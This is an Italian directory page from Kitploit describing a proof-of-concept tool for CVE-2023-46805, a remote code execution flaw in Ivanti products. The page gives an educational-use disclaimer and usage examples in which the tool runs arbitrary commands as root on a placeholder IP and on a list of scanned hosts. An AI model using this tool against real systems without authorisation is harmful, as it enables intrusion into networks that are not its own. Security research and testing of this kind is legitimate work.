Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/w2xim3/cve-2023-46805
Scanner di VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlApprendimento e Formazione
GitHubw2xim3/cve-2023-46805

CVE-2023-46805

CVE-2023-46805 Ivanti POC RCE - Scanner ultraveloce.

Vedi Repository
212 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Titolo: Proof of Concept per CVE-2023-46805 - Solo per uso educativo

Licenza: Questo lavoro è rilasciato sotto la Creative Commons Attribution 4.0 International License (CC BY 4.0). Sei libero di condividere, copiare, distribuire e trasmettere questo lavoro, di adattarlo o utilizzarlo per altri scopi, a condizione che venga attribuita la paternità in modo appropriato.

Disclaimer: Questa Proof of Concept (PoC) è fornita esclusivamente a scopo educativo e di ricerca sulla sicurezza informatica. Né l'autore, né l'organizzazione affiliata, né qualsiasi altra parte coinvolta nella creazione, produzione o consegna di questo contenuto sarà ritenuta responsabile per danni, inclusi, a titolo esemplificativo, danni diretti, indiretti, incidentali, speciali, consequenziali o punitivi derivanti dall'uso o dall'incapacità di utilizzare questo contenuto.

Obiettivo educativo: Questa PoC è intesa ad aiutare la comunità della sicurezza informatica a comprendere e mitigare la vulnerabilità identificata come CVE-2023-46805. Non deve essere utilizzata in un ambiente di produzione o per attività dannose.

Descrizione della vulnerabilità: Ivanti RCE

Dettagli della PoC:

root@kitploit:~
Usage of ./CVE-Ivanti:
  -cmd string
        The command to replace 'id' in the payload (default "id")
  -t int
        Number of concurrent threads (default 5)

root@kitploit:~
go build
echo "https://1.2.3.4" | ./CVE-Ivanti
https://1.2.3.4 {"error": "uid=0(root) gid=0(root) groups=0(root)\n"}

cat myscope.txt -t 5 | ./CVE-Ivanti
https://ssl1.mysite.com:443 {"error": "uid=0(root) gid=0(root) groups=0(root)\n"}
https://ssl3.mysite.com:443 {"error": "uid=0(root) gid=0(root) groups=0(root)\n"}

echo "https://1.2.3.4" | ./CVE-Ivanti -cmd 'ls /'
Scarica lo strumento